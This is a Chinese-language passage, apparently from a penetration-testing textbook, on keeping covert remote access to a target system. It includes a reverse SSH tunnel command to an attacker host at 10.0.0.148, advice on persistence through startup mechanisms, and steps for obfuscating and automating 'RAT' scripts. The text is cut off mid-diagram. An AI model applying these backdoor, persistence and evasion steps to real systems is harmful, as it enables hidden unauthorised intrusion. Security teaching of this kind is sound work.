网络安全中的系统管理与日志记录
在网络安全领域,系统管理和日志记录是保障系统安全稳定运行的关键环节。下面将详细介绍远程访问、用户与权限管理以及日志记录等方面的重要知识。
1. 远程访问目标系统
在渗透测试中,保持对目标系统的远程访问至关重要。它能让我们在必要时重新连接到目标网络。不过,选择远程访问工具时,关键是要确保其不被检测到。
需要注意的是,所介绍的远程访问方法在系统重启后将失效。为解决这个问题,要把它们的启动与登录脚本、定时任务或其他系统启动时执行的机制关联起来。
1.1 实验操作
- 设置SSH后门:在目标系统上设置SSH后门,目标系统监听端口22,攻击者通过本地端口1337连接。攻击者系统IP为10.0.0.148,用户为root。命令如下:
ssh -R 1337:localhost:22 root@10.0.0.148- 混淆脚本:通过第14章描述的方法之一对RemoteRat.sh进行加密。
- 扩展脚本:扩展LocalRat.sh,使其在RemoteRat.sh建立连接时自动向目标系统发送一系列命令。命令列表可从攻击者系统的文件中读取,命令输出保存到同一系统的文件中。
1.2 操作流程
graph LR A[设置SSH后